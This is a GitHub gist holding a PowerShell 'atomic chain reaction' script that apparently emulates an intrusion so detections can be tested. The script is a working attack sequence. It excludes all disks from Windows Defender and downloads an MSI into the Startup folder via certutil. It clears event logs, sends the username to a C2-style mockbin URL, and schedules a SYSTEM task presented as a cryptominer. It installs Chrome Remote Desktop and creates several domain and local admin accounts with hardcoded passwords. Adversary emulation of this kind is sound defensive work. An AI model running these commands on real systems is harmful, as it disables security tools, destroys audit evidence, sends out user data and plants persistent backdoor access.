Created
February 27, 2024 14:33
-
-
Save MHaggis/9c463080ea08657c25d57b2adcfd76d6 to your computer and use it in GitHub Desktop.
Single Atomic Chain Reaction for Slash And Grab
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ## Chain Reaction | |
| ## Add all logical disks to Windows Defender exclusion list | |
| Write-Output "Adding all logical disks to Windows Defender exclusion list" | |
| foreach ($disk in Get-WmiObject Win32_Logicaldisk){ | |
| Add-MpPreference -ExclusionPath ($disk.deviceid + "\") | |
| } | |
| Start-Sleep -s 3 | |
| ## Download and move a file to the startup folder | |
| Write-Output "Downloading and moving a file to the startup folder" | |
| cmd /c certutil -urlcache -f https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1218.007/bin/T1218.007_JScript.msi c:\mpyutild.msi | |
| move c:\mpyutild.msi "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\mpyutild.msi" | |
| Start-Sleep -s 3 | |
| ## Clear Event Logs | |
| Write-Output "Clearing Event Logs" | |
| wevtutil cl Application | |
| Start-Sleep -s 3 | |
| ## Checkin with C2 | |
| Write-Output "Checking in with C2" | |
| powershell.exe Invoke-WebRequest -Uri https://9d06e4f428c94e3295277e2784036c61.api.mockbin.io/MyUserName_$env:UserName | |
| Start-Sleep -s 3 | |
| ## schtask for cryptominer | |
| Write-Output "Creating schtask for cryptominer" | |
| SCHTASKS /Create /TN "Microsoft\Windows\Wininet\UserCache_1708535250863" /TR "C:\Windows\Help\Help\SentinelUI.exe" /RU SYSTEM /SC ONSTART /RL HIGHEST /F /DELAY 0000:05 | |
| Start-Sleep -s 3 | |
| ## Download Chrome Remote Desktop and install | |
| Write-Output "Downloading Chrome Remote Desktop and installing" | |
| # Download from Google | |
| (New-Object System.Net.WebClient).DownloadFile('https://dl.google.com/edgedl/chrome-remote-desktop/chromeremotedesktophost.msi', $env:ProgramData+'\\1.msi') | |
| # Install | |
| msiexec /i C:\\ProgramData\\1.msi | |
| Start-Sleep -s 3 | |
| ## Add User | |
| Write-Output "Adding User" | |
| net user /add default test@2021! /domain | |
| net group \"Domain Admins\" default /add /domain | |
| net group \"Enterprise Admins\" default /add /domain | |
| net group \"Remote Desktop Users\" default /add /domain | |
| net group \"Group Policy Creator Owners\" default /add /domain | |
| net group \"Schema Admins\" default /add /domain | |
| net user default /active:yes /domain | |
| net user /add default1 test@2021! /domain | |
| net user /add default1 test@2021! /domain | |
| net user /add oldadmin Pass8080!! | |
| net localgroup administrators oldadmin /add | |
| net user temp 123123qwE /add /domain | |
| net group \"Domain Admins\" temp /add /domain | |
| Start-Sleep -s 3 |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment